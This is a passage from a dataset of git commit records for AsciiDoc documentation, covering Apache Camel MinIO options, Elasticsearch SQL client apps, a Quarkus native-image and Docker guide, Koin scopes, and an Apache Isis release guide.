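A minimal sketch of such a route (the bucket names are illustrative assumptions):\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Drop the CamelMinioBucketName header set by the consumer so the\n\/\/ producer writes to its own bucket instead of the original one.\nfrom(\"minio:\/\/sourcebucket?minioClient=#minioClient\")\n    .removeHeader(MinioConstants.BUCKET_NAME)\n    .to(\"minio:\/\/targetbucket?minioClient=#minioClient\");\n--------------------------------------------------------------------------------\n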
== MoveAfterRead consumer option\n\nIn addition to deleteAfterRead, another option has been added: moveAfterRead. With this option enabled the consumed object will be moved to a target destination bucket instead of being only deleted.\nThis will require specifying the destinationBucketName option. As an example:\n\n[source,java]\n--------------------------------------------------------------------------------\n from(\"minio:\/\/mycamelbucket?minioClient=#minioClient&moveAfterRead=true&destinationBucketName=myothercamelbucket\")\n .to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIn this case the objects consumed will be moved to the myothercamelbucket bucket and deleted from the original one (because deleteAfterRead is set to true by default).\n\n== Using a POJO as body\n\nSometimes building a Minio request can be complex, because of the multiple options. We introduce the possibility to use a POJO as the body.\nIn Minio there are multiple operations you can submit; as an example, for a list objects request, you can do something like:\n\n[source,java]\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:minio\")\n    .setBody(constant(ListObjectsArgs.builder()\n        .bucket(bucketName)\n        .recursive(getConfiguration().isRecursive())\n        .build()))\n    .to(\"minio:\/\/test?minioClient=#minioClient&operation=listObjects&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly, without the need to pass headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-minio<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\{camel-version}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$minio-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32a22ca00e5329b785e4aa248677aab7d3349191","subject":"DOC: improved wording in SQL client app section","message":"DOC: improved wording in SQL client app section\n","repos":"gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/reference\/sql\/endpoints\/client-apps\/index.asciidoc","new_file":"docs\/reference\/sql\/endpoints\/client-apps\/index.asciidoc","new_contents":"[role=\"xpack\"]\r\n[testenv=\"platinum\"]\r\n[[sql-client-apps]]\r\n== SQL Client Applications\r\n\r\nThanks to its <<sql-jdbc, JDBC>> interface, a broad range of third-party applications can use {es}'s SQL capabilities.\r\nThis section lists, in alphabetical order, a number of them and their respective configuration - the list however is by no means comprehensive (feel free to https:\/\/www.elastic.co\/blog\/art-of-pull-request[submit a PR] to improve it):\r\nas long as the app can use the {es-sql} driver, it can use {es-sql}.\r\n\r\n* <<sql-client-apps-dbeaver, DBeaver>>\r\n* <<sql-client-apps-dbvis, DbVisualizer>>\r\n* <<sql-client-apps-squirrel, SQuirreL SQL>>\r\n* <<sql-client-apps-workbench, SQL 
Workbench>>\r\n\r\nNOTE: Each application has its own requirements and license; these are outside the scope of this documentation\r\nwhich covers only the configuration aspect with {es-sql}.\r\n\r\ninclude::dbeaver.asciidoc[]\r\ninclude::dbvis.asciidoc[]\r\ninclude::squirrel.asciidoc[]\r\ninclude::workbench.asciidoc[]\r\n","old_contents":"[role=\"xpack\"]\r\n[testenv=\"platinum\"]\r\n[[sql-client-apps]]\r\n== SQL Client Applications\r\n\r\nThanks to its <<sql-jdbc, JDBC>> interface, {es-sql} supports a broad range of applications.\r\nThis section lists, in alphabetical order, a number of them and their respective configuration - the list however is by no means comprehensive (feel free to https:\/\/www.elastic.co\/blog\/art-of-pull-request[submit a PR] to improve it):\r\nas long as the app can use the {es-sql} driver, it can use {es-sql}.\r\n\r\n* <<sql-client-apps-dbeaver, DBeaver>>\r\n* <<sql-client-apps-dbvis, DbVisualizer>>\r\n* <<sql-client-apps-squirrel, SQuirreL SQL>>\r\n* <<sql-client-apps-workbench, SQL Workbench>>\r\n\r\nNOTE: Each application has its own requirements and license; these are outside the scope of this documentation\r\nwhich covers only the configuration aspect with {es-sql}.\r\n\r\ninclude::dbeaver.asciidoc[]\r\ninclude::dbvis.asciidoc[]\r\ninclude::squirrel.asciidoc[]\r\ninclude::workbench.asciidoc[]\r\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"713263cf48f8cf3e49d8f8f699679541c0b8a262","subject":"Let's put Linux first","message":"Let's put Linux first\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/building-native-image-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/building-native-image-guide.adoc","new_contents":"= {project-name} - Building a Native Image\n\nThis guide covers:\n\n* Compiling the application to a native executable\n* The packaging of the application in a Docker container\n\nThis guide takes as input the application developed in the link:getting-started-guide.html[Getting Started Guide].\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* GraalVM installed from the http:\/\/www.graalvm.org\/downloads\/[GraalVM web site].\nUsing the community edition is enough.\nAt least version {graal-version} is required.\n* The `GRAALVM_HOME` environment variable configured appropriately\n* Apache Maven 3.5.3+\n* A running Docker\n* The code of the application developed in the link:getting-started-guide.adoc[Getting Started Guide].\n\n[NOTE]\n====\nOnce you have downloaded GraalVM, expand the archive and set the `GRAALVM_HOME` variable to this location:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/`\n\nOn MacOS, point the variable to the `Home` sub-directory:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/Contents\/Home\/`\n====\n\nRemember, you need to configure Maven as indicated in the link:maven-config.html[Maven configuration page].\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and package the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started-native` directory.\n\n== Producing a native executable\n\nLet's now produce a native executable for our application.\nIt 
improves the startup time of the application, and produces a minimal disk footprint.\nThe executable would have everything to run the application including the \"JVM\" (shrunk to be just enough to run the application), and the application.\n\nimage:native-image-process.png[Creating a native executable, width=640]\n\nBefore going further, be sure that the `GRAALVM_HOME` environment variable is configured appropriately.\n\nIf you have generated the application from the previous tutorial, you can find in the `pom.xml` the following _profile_:\n\n[source,xml]\n----\n<profiles>\n <profile>\n <id>native<\/id>\n <build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>native-image<\/goal>\n <\/goals>\n <configuration>\n <enableHttpUrlHandler>true<\/enableHttpUrlHandler>\n <\/configuration>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n <\/profile>\n<\/profiles>\n----\n\nWe use a profile because, you will see very soon, packaging the native image takes a _few_ seconds.\n\nCreate a native executable using: `mvn package -Pnative`.\n\nIn addition to the regular files, the build also produces `target\/quarkus-quickstart-runner`.\nYou can run it using: `.\/target\/quarkus-quickstart-runner`.\n\n== Testing the native executable\n\nProducing a native executable can lead to a few issues, and so it's also a good idea to run some tests against the application running in the native file.\n\nIn the `pom.xml` file, extend the `native` profile with:\n\n[source, xml]\n----\n<plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-failsafe-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>integration-test<\/goal>\n <goal>verify<\/goal>\n <\/goals>\n <configuration>\n <systemProperties>\n <native.image.path>${project.build.directory}\/${project.build.finalName}-runner<\/native.image.path>\n <\/systemProperties>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceIT.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\n\nimport io.quarkus.test.junit.SubstrateTest;\n\n@SubstrateTest \/\/ <1>\npublic class GreetingResourceIT extends GreetingResourceTest { \/\/ <2>\n\n \/\/ Run the same tests\n\n}\n----\n<1> Use another test runner that starts the application from the native file before the tests.\nThe executable is retrieved using the `native.image.path` system property configured in the _Failsafe Maven Plugin_.\n<2> We extend our previous tests, but you can also implement your tests\n\nTo see the `GreetingResourceIT` run against the native image, add a verify goal:\n[source]\n----\nmvn package verify -Pnative\n...\n[quarkus-quickstart-runner:50955] universe: 391.96 ms\n[quarkus-quickstart-runner:50955] (parse): 904.37 ms\n[quarkus-quickstart-runner:50955] (inline): 1,143.32 ms\n[quarkus-quickstart-runner:50955] (compile): 6,228.44 ms\n[quarkus-quickstart-runner:50955] compile: 9,130.58 ms\n[quarkus-quickstart-runner:50955] image: 2,101.42 ms\n[quarkus-quickstart-runner:50955] write: 803.18 ms\n[quarkus-quickstart-runner:50955] [total]: 33,520.15 ms\n[INFO]\n[INFO] --- maven-failsafe-plugin:2.22.0:integration-test (default) @ quarkus-quickstart-native ---\n[INFO]\n[INFO] -------------------------------------------------------\n[INFO] T E S T 
S\n[INFO] -------------------------------------------------------\n[INFO] Running org.acme.quickstart.GreetingResourceIT\nExecuting [\/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started-native\/target\/quarkus-quickstart-runner, -Dquarkus.http.port=8081, -Dtest.url=http:\/\/localhost:8081, -Dquarkus.log.file.path=target\/quarkus.log]\n2019-02-28 16:52:42,020 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.007s. Listening on: http:\/\/localhost:8080\n2019-02-28 16:52:42,021 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.081 s - in org.acme.quickstart.GreetingResourceIT\n[INFO]\n[INFO] Results:\n[INFO]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0\n\n...\n----\n\n== Producing a Docker container\n\nIMPORTANT: Before going further, be sure to have a working Docker environment.\n\nYou can run the application in a Docker container using the JAR produced by the Quarkus Maven Plugin.\nHowever, in this guide we focus on creating a Docker image using the produced native executable.\n\nBy default, the native image is tailored for your operating system (Linux, macOS, Windows etc).\nBecause the Docker container may not use the same _executable_ format as the one produced by your operating system,\nwe will instruct the Maven build to produce an executable from inside a Docker container:\n\n[source, bash]\n----\nmvn package -Pnative -Dnative-image.docker-build=true\n----\n\nThe produced executable will be a 64 bit Linux executable, so depending on your operating system it may no longer be runnable.\nHowever, it's not an issue as we are going to copy it to a Docker container.\nThe project generation has provided a `Dockerfile` in the `src\/main\/docker` directory with the following content:\n\n[source]\n----\nFROM registry.fedoraproject.org\/fedora-minimal\nWORKDIR \/work\/\nCOPY target\/*-runner \/work\/application\nRUN chmod 775 \/work\nEXPOSE 8080\nCMD [\".\/application\", \"-Dquarkus.http.host=0.0.0.0\"]\n----\n\nThen, if you didn't delete the generated native executable, you can build the docker image with:\n\n[source]\n----\ndocker build -f src\/main\/docker\/Dockerfile -t quarkus-quickstart\/quickstart .\n----\n\nAnd finally, run it with:\n\n[source]\n----\ndocker run -i --rm -p 8080:8080 quarkus-quickstart\/quickstart\n----\n\nNOTE: Interested by tiny Docker images, check the {quarkus-tree-url}\/docker\/distroless[distroless] version.\n\n== What's next?\n\nThis guide covered the creation of a native (binary) executable for your application.\nIt provides an application exhibiting a swift startup time and consuming less memory.\nHowever, there is much more.\nWe recommend continuing the journey with the link:kubernetes-guide.html[deployment to Kubernetes and OpenShift].\n","old_contents":"= {project-name} - Building a Native Image\n\nThis guide covers:\n\n* Compiling the application to a native executable\n* The packaging of the application in a Docker container\n\nThis guide takes as input the application developed in the link:getting-started-guide.html[Getting Started Guide].\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 15 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* GraalVM installed from the http:\/\/www.graalvm.org\/downloads\/[GraalVM web site].\nUsing the community edition is enough.\nAt least version {graal-version} is required.\n* The `GRAALVM_HOME` environment variable 
configured appropriately\n* Apache Maven 3.5.3+\n* A running Docker\n* The code of the application developed in the link:getting-started-guide.adoc[Getting Started Guide].\n\n[NOTE]\n====\nOnce you have downloaded GraalVM, expand the archive and set the `GRAALVM_HOME` variable to this location:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/`\n\nOn MacOS, point the variable to the `Home` sub-directory:\n\n`export GRAALVM_HOME=~clement\/Development\/graalvm\/Contents\/Home\/`\n====\n\nRemember, you need to configure Maven as indicated in the link:maven-config.html[Maven configuration page].\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and package the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `getting-started-native` directory.\n\n== Producing a native executable\n\nLet's now produce a native executable for our application.\nIt improves the startup time of the application, and produces a minimal disk footprint.\nThe executable would have everything to run the application including the \"JVM\" (shrunk to be just enough to run the application), and the application.\n\nimage:native-image-process.png[Creating a native executable, width=640]\n\nBefore going further, be sure that the `GRAALVM_HOME` environment variable is configured appropriately.\n\nIf you have generated the application from the previous tutorial, you can find in the `pom.xml` the following _profile_:\n\n[source,xml]\n----\n<profiles>\n <profile>\n <id>native<\/id>\n <build>\n <plugins>\n <plugin>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-maven-plugin<\/artifactId>\n <version>${quarkus.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>native-image<\/goal>\n <\/goals>\n <configuration>\n <enableHttpUrlHandler>true<\/enableHttpUrlHandler>\n <\/configuration>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n <\/profile>\n<\/profiles>\n----\n\nWe use a profile because, you will see very soon, packaging the native image takes a _few_ seconds.\n\nCreate a native executable using: `mvn package -Pnative`.\n\nIn addition to the regular files, the build also produces `target\/quarkus-quickstart-runner`.\nYou can run it using: `.\/target\/quarkus-quickstart-runner`.\n\n== Testing the native executable\n\nProducing a native executable can lead to a few issues, and so it's also a good idea to run some tests against the application running in the native file.\n\nIn the `pom.xml` file, extend the `native` profile with:\n\n[source, xml]\n----\n<plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-failsafe-plugin<\/artifactId>\n <version>${surefire.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>integration-test<\/goal>\n <goal>verify<\/goal>\n <\/goals>\n <configuration>\n <systemProperties>\n <native.image.path>${project.build.directory}\/${project.build.finalName}-runner<\/native.image.path>\n <\/systemProperties>\n <\/configuration>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nThen, create the `src\/test\/java\/org\/acme\/quickstart\/GreetingResourceIT.java` with the following content:\n\n[source,java]\n----\npackage org.acme.quickstart;\n\n\nimport io.quarkus.test.junit.SubstrateTest;\n\n@SubstrateTest \/\/ <1>\npublic class GreetingResourceIT extends GreetingResourceTest { \/\/ <2>\n\n \/\/ Run the same 
tests\n\n}\n----\n<1> Use another test runner that starts the application from the native file before the tests.\nThe executable is retrieved using the `native.image.path` system property configured in the _Failsafe Maven Plugin_.\n<2> We extend our previous tests, but you can also implement your tests\n\nTo see the `GreetingResourceIT` run against the native image, add a verify goal:\n[source]\n----\nmvn package verify -Pnative\n...\n[quarkus-quickstart-runner:50955] universe: 391.96 ms\n[quarkus-quickstart-runner:50955] (parse): 904.37 ms\n[quarkus-quickstart-runner:50955] (inline): 1,143.32 ms\n[quarkus-quickstart-runner:50955] (compile): 6,228.44 ms\n[quarkus-quickstart-runner:50955] compile: 9,130.58 ms\n[quarkus-quickstart-runner:50955] image: 2,101.42 ms\n[quarkus-quickstart-runner:50955] write: 803.18 ms\n[quarkus-quickstart-runner:50955] [total]: 33,520.15 ms\n[INFO]\n[INFO] --- maven-failsafe-plugin:2.22.0:integration-test (default) @ quarkus-quickstart-native ---\n[INFO]\n[INFO] -------------------------------------------------------\n[INFO] T E S T S\n[INFO] -------------------------------------------------------\n[INFO] Running org.acme.quickstart.GreetingResourceIT\nExecuting [\/Users\/starksm\/Dev\/JBoss\/Protean\/starksm64-quarkus-quickstarts\/getting-started-native\/target\/quarkus-quickstart-runner, -Dquarkus.http.port=8081, -Dtest.url=http:\/\/localhost:8081, -Dquarkus.log.file.path=target\/quarkus.log]\n2019-02-28 16:52:42,020 INFO [io.quarkus] (main) Quarkus 1.0.0.Alpha1-SNAPSHOT started in 0.007s. Listening on: http:\/\/localhost:8080\n2019-02-28 16:52:42,021 INFO [io.quarkus] (main) Installed features: [cdi, resteasy]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.081 s - in org.acme.quickstart.GreetingResourceIT\n[INFO]\n[INFO] Results:\n[INFO]\n[INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0\n\n...\n----\n\n== Producing a Docker container\n\nIMPORTANT: Before going further, be sure to have a working Docker environment.\n\nYou can run the application in a Docker container using the JAR produced by the Quarkus Maven Plugin.\nHowever, in this guide we focus on creating a Docker image using the produced native executable.\n\nBy default, the native image is tailored for your operating system (Windows, macOS etc).\nBecause the Docker container may not use the same _executable_ format as the one produced by your operating system,\nwe will instruct the Maven build to produce an executable from inside a Docker container:\n\n[source, bash]\n----\nmvn package -Pnative -Dnative-image.docker-build=true\n----\n\nThe produced executable will be a 64 bit Linux executable, so depending on your operating system it may no longer be runnable.\nHowever, it's not an issue as we are going to copy it to a Docker container.\nThe project generation has provided a `Dockerfile` in the `src\/main\/docker` directory with the following content:\n\n[source]\n----\nFROM registry.fedoraproject.org\/fedora-minimal\nWORKDIR \/work\/\nCOPY target\/*-runner \/work\/application\nRUN chmod 775 \/work\nEXPOSE 8080\nCMD [\".\/application\", \"-Dquarkus.http.host=0.0.0.0\"]\n----\n\nThen, if you didn't delete the generated native executable, you can build the docker image with:\n\n[source]\n----\ndocker build -f src\/main\/docker\/Dockerfile -t quarkus-quickstart\/quickstart .\n----\n\nAnd finally, run it with:\n\n[source]\n----\ndocker run -i --rm -p 8080:8080 quarkus-quickstart\/quickstart\n----\n\nNOTE: Interested by tiny Docker images, check the 
{quarkus-tree-url}\/docker\/distroless[distroless] version.\n\n== What's next?\n\nThis guide covered the creation of a native (binary) executable for your application.\nIt provides an application exhibiting a swift startup time and consuming less memory.\nHowever, there is much more.\nWe recommend continuing the journey with the link:kubernetes-guide.html[deployment to Kubernetes and OpenShift].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5424e7f6cd818c6b5a5b9215c0c0502863547380","subject":"Fix missing parameter in example code","message":"Fix missing parameter in example code\n","repos":"Ekito\/koin,Ekito\/koin,InsertKoinIO\/koin,InsertKoinIO\/koin,InsertKoinIO\/koin","old_file":"koin-projects\/koin-core\/src\/docs\/asciidoc\/scope-api.adoc","new_file":"koin-projects\/koin-core\/src\/docs\/asciidoc\/scope-api.adoc","new_contents":"== Using Scopes\n\nKoin brings a simple API to let you define instances that are tied to a limit lifetime.\n\n=== What is a scope?\n\nScope is a fixed duration of time or method calls in which an object exists.\nAnother way to look at this is to think of scope as the amount of time an object\u2019s state persists.\nWhen the scope context ends, any objects bound under that scope cannot be injected again (they are dropped from the container).\n\n=== Scope definition\n\nBy default in Koin, we have 3 kind of scopes:\n\n- `single` definition, create an object that persistent with the entire container lifetime (can't be dropped).\n- `factory` definition, create a new object each time. Short live. No persistence in the container (can't be shared).\n- `scope` definition, create an object that persistent tied to the associated scope lifetime.\n\nTo declare a scope definition, use the `scope` function with a given scope Id:\n\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n----\n\n[IMPORTANT]\n====\nA scope definition can't be resolved if associated scope has not been created. Then `get<Presenter>()` return an error.\n====\n\n=== Create & retrieve a scope\n\nFrom a `KoinComponent` class, just use the `getKoin()` function to have access to following functions\n\n- `createScope(id : String)` - create a scope with given id in the Koin scope registry\n- `getScope(id : String)` - retrieve a previously created scope with given id, from the Koin scope registry\n- `getOrCreateScope(id : String)` - create or retrieve if already created, the scope with given id in the Koin scope registry\n\n=== Using a scope\n\nOnce you have create a `Scope` instance, let use it to resolve a component:\n\n.from a KoinComponent class\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n\n\/\/ create a scope\nval session = getKoin().createScope(\"scope_id\")\n\n\/\/ or get scope if already created before\nval session = getKoin().getScope(\"scope_id\")\n\n\/\/ will return the same instance of Presenter until Scope 'scope_id' is closed\nval presenter = get<Presenter>()\n----\n\nJust resolving it: `by inject()` or `get()`. The DSL will indicate which scope to use.\n\n=== Inject it with DSL\n\nIf one of your definition need to inject a scope instance, just resolve it ... 
but be sure to have created the scope before:\n\n[source,kotlin]\n----\nclass Presenter(val userSession : UserSession)\n----\n\nJust inject it into constructor, with the right scope:\n\n[source,kotlin]\n----\nmodule {\n \/\/ Shared user session data\n scope(\"session\") { UserSession() }\n \/\/ Inject UserSession instance from \"session\" Scope\n factory { Presenter(get())}\n}\n----\n\n=== Closing a scope\n\nOnce your scope is finished, just closed it with the `Scope.close()` function:\n\n[source,kotlin]\n----\n\/\/ from a KoinComponent\nval session = getKoin().createScope(\"session\")\n\/\/ will return the same instance of Presenter until 'session' is closed\nval presenter = get<Presenter>()\n\n\/\/ close it\nsession.close()\n\/\/ instance of presenter has been dropped\n----\n\n[IMPORTANT]\n====\nBeware that you can't inject instances anymore from a closed scope.\n====\n\n=== Scope closing callback\n\nIt's also possible to listen scope closing. Just use the `registerScopeCallback()` function to register a `ScopeCallback` instance.\n\nThis will notify your `ScopeCallback` on the `onClose(id: String)` function, when a scope has been closed.\n\n[source,kotlin]\n----\nregisterScopeCallback(object : ScopeCallback{\n override fun onClose(id: String) {\n \/\/ scope id has been closed\n }\n })\n----\n","old_contents":"== Using Scopes\n\nKoin brings a simple API to let you define instances that are tied to a limit lifetime.\n\n=== What is a scope?\n\nScope is a fixed duration of time or method calls in which an object exists.\nAnother way to look at this is to think of scope as the amount of time an object\u2019s state persists.\nWhen the scope context ends, any objects bound under that scope cannot be injected again (they are dropped from the container).\n\n=== Scope definition\n\nBy default in Koin, we have 3 kind of scopes:\n\n- `single` definition, create an object that persistent with the entire container lifetime (can't be dropped).\n- `factory` definition, create a new object each time. Short live. No persistence in the container (can't be shared).\n- `scope` definition, create an object that persistent tied to the associated scope lifetime.\n\nTo declare a scope definition, use the `scope` function with a given scope Id:\n\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n----\n\n[IMPORTANT]\n====\nA scope definition can't be resolved if associated scope has not been created. Then `get<Presenter>()` return an error.\n====\n\n=== Create & retrieve a scope\n\nFrom a `KoinComponent` class, just use the `getKoin()` function to have access to following functions\n\n- `createScope(id : String)` - create a scope with given id in the Koin scope registry\n- `getScope(id : String)` - retrieve a previously created scope with given id, from the Koin scope registry\n- `getOrCreateScope(id : String)` - create or retrieve if already created, the scope with given id in the Koin scope registry\n\n=== Using a scope\n\nOnce you have create a `Scope` instance, let use it to resolve a component:\n\n.from a KoinComponent class\n[source,kotlin]\n----\nmodule {\n scope(\"scope_id\") { Presenter() }\n}\n\n\/\/ create a scope\nval session = getKoin().createScope(\"scope_id\")\n\n\/\/ or get scope if already created before\nval session = getKoin().getScope(\"scope_id\")\n\n\/\/ will return the same instance of Presenter until Scope 'scope_id' is closed\nval presenter = get<Presenter>()\n----\n\nJust resolving it: `by inject()` or `get()`. 
The DSL will indicate which scope to use.\n\n=== Inject it with DSL\n\nIf one of your definition need to inject a scope instance, just resolve it ... but be sure to have created the scope before:\n\n[source,kotlin]\n----\nclass Presenter(val userSession : UserSession)\n----\n\nJust inject it into constructor, with the right scope:\n\n[source,kotlin]\n----\nmodule {\n \/\/ Shared user session data\n scope { UserSession() }\n \/\/ Inject UserSession instance from \"session\" Scope\n factory { Presenter(get())}\n}\n----\n\n=== Closing a scope\n\nOnce your scope is finished, just closed it with the `Scope.close()` function:\n\n[source,kotlin]\n----\n\/\/ from a KoinComponent\nval session = getKoin().createScope(\"session\")\n\/\/ will return the same instance of Presenter until 'session' is closed\nval presenter = get<Presenter>()\n\n\/\/ close it\nsession.close()\n\/\/ instance of presenter has been dropped\n----\n\n[IMPORTANT]\n====\nBeware that you can't inject instances anymore from a closed scope.\n====\n\n=== Scope closing callback\n\nIt's also possible to listen scope closing. Just use the `registerScopeCallback()` function to register a `ScopeCallback` instance.\n\nThis will notify your `ScopeCallback` on the `onClose(id: String)` function, when a scope has been closed.\n\n[source,kotlin]\n----\nregisterScopeCallback(object : ScopeCallback{\n override fun onClose(id: String) {\n \/\/ scope id has been closed\n }\n })\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de435a130c2ebfa5d4098b392db6f750cc7b3c4","subject":"ISIS-1521: updates docs for workaround for recreating archetype on Windows and Maven 3.3.3","message":"ISIS-1521: updates docs for workaround for recreating archetype on Windows and Maven 3.3.3\n","repos":"estatio\/isis,apache\/isis,oscarbou\/isis,oscarbou\/isis,estatio\/isis,apache\/isis,estatio\/isis,incodehq\/isis,incodehq\/isis,apache\/isis,apache\/isis,niv0\/isis,sanderginn\/isis,apache\/isis,incodehq\/isis,sanderginn\/isis,estatio\/isis,apache\/isis,oscarbou\/isis,niv0\/isis,sanderginn\/isis,oscarbou\/isis,niv0\/isis,niv0\/isis,incodehq\/isis,sanderginn\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_cgcom_cutting-a-release.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_cgcom_cutting-a-release.adoc","new_contents":"[[_cgcom_cutting-a-release]]\n= Cutting a Release\n:notice: licensed to the apache software foundation (asf) under one or more contributor license agreements. see the notice file distributed with this work for additional information regarding copyright ownership. the asf licenses this file to you under the apache license, version 2.0 (the \"license\"); you may not use this file except in compliance with the license. you may obtain a copy of the license at. http:\/\/www.apache.org\/licenses\/license-2.0 . unless required by applicable law or agreed to in writing, software distributed under the license is distributed on an \"as is\" basis, without warranties or conditions of any kind, either express or implied. 
see the license for the specific language governing permissions and limitations under the license.\n:_basedir: ..\/\n:_imagesdir: images\/\n:toc: right\n\n\nThe release process consists of:\n\n* the release manager cutting the release (documented below)\n* members of the Apache Isis PMC xref:cgcom.adoc#_cgcom_verifying-releases[verifying] and voting on the release\n* the release manager performing post-release tasks, for either a xref:cgcom.adoc#_cgcom_post-release-successful[successful] or an xref:cgcom.adoc#_cgcom_post-release-unsuccessful[unsuccessful] vote.\n\nApache Isis itself consists of two separately releasable modules; relative to the link:https:\/\/git-wip-us.apache.org\/repos\/asf\/isis\/repo?p=isis.git;a=tree[source code root] there are:\n\n* `core`\n* `component\/example\/archetypes\/simpleapp`\n\nThis section details the process for formally releasing Isis modules. It describes the process for both `core` and then the archetype. The subsequent sections describe how other committers can xref:cgcom.adoc#_cgcom_verifying-releases[verify a release] and how the release manager can then perform xref:cgcom.adoc#_cgcom_post-release[post-release] activities and set up for the next development iteration.\n\nIf you've not performed a release before, then note that there are some configuration xref:cgcom.adoc#_cgcom_release-process-prereqs[prerequisites] that must be configured first. In particular, you'll need signed public\/private keys, and the ASF Nexus staging repo configured in your local `~\/.m2\/settings.xml` file.\n\nThese release notes use bash command-line tools. They should work on Linux and macOS; for Windows, use mSysGit.\n\n\n\n\n[[_cgcom_cutting-a-release_obtain-consensus]]\n== Obtain Consensus\n\nBefore releasing `core`, ensure there is consensus on the link:..\/support.html[dev mailing list] that this is the right time for a release. The discussion should include confirming the version number to be used, and confirm the content.\n\nThese discussions should also confirm the version number of the module being released. This should be in line with our xref:cgcom.adoc#_cgcom_versioning-policy[semantic versioning policy].\n\n\nMake sure you have a JIRA ticket open against which to perform all commits. In most cases a JIRA ticket will have been created at the beginning of the previous release cycle.\n\n\n\n[[_cgcom_cutting-a-release_set-environment-variables]]\n== Set environment variables\n\nWe use environment variables to parameterize as many of the steps as possible. For example:\n\n[source,bash]\n----\ncd core\nexport ISISTMP=\/c\/tmp # <1>\nexport 